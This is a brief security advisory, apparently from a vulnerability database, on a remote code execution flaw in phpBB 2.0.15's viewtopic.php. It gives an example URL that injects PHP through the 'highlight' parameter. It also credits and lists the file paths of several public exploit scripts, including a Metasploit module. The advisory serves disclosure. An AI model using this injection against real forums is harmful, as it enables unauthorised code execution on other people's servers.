phpBB 'viewtopic.php' Remote Code Execution Vulnerability

phpBB 'viewtopic.php' Remote Code Execution Vulnerability

The following example is available:

http://www.example.com/phpbb2.0.15/viewtopic.php?t=2&highlight='.printf(123456).'

dab <dab@digitalsec.net> has supplied the following exploit (phpbb2_0_15.pl), rattle@awarenetwork.org has supplied the exploit (rattle.py), SecureD <gvr.secured@gmail.com> has supplied the exploit (phpbbSecureD.pl),
st0ke at milw0rm.com has supplied the exploit (phpBB2.0.15-comm-exec.exp.pl), valsmith <valsmith@offensivecomputing.net> and H D Moore <hdm@metasploit.com> have supplied the Metasploit Framework exploit (phpbb_highlight.pm):

/data/vulnerabilities/exploits/phpBBCodeExecExploitRUSH.pl
/data/vulnerabilities/exploits/phpbb_urldecode_poc.pl
/data/vulnerabilities/exploits/phpbb2_0_15.pl
/data/vulnerabilities/exploits/rattle.py
/data/vulnerabilities/exploits/phpbbSecureD.pl
/data/vulnerabilities/exploits/phpBB2.0.15-comm-exec.exp.pl
/data/vulnerabilities/exploits/phpbb_highlight.pm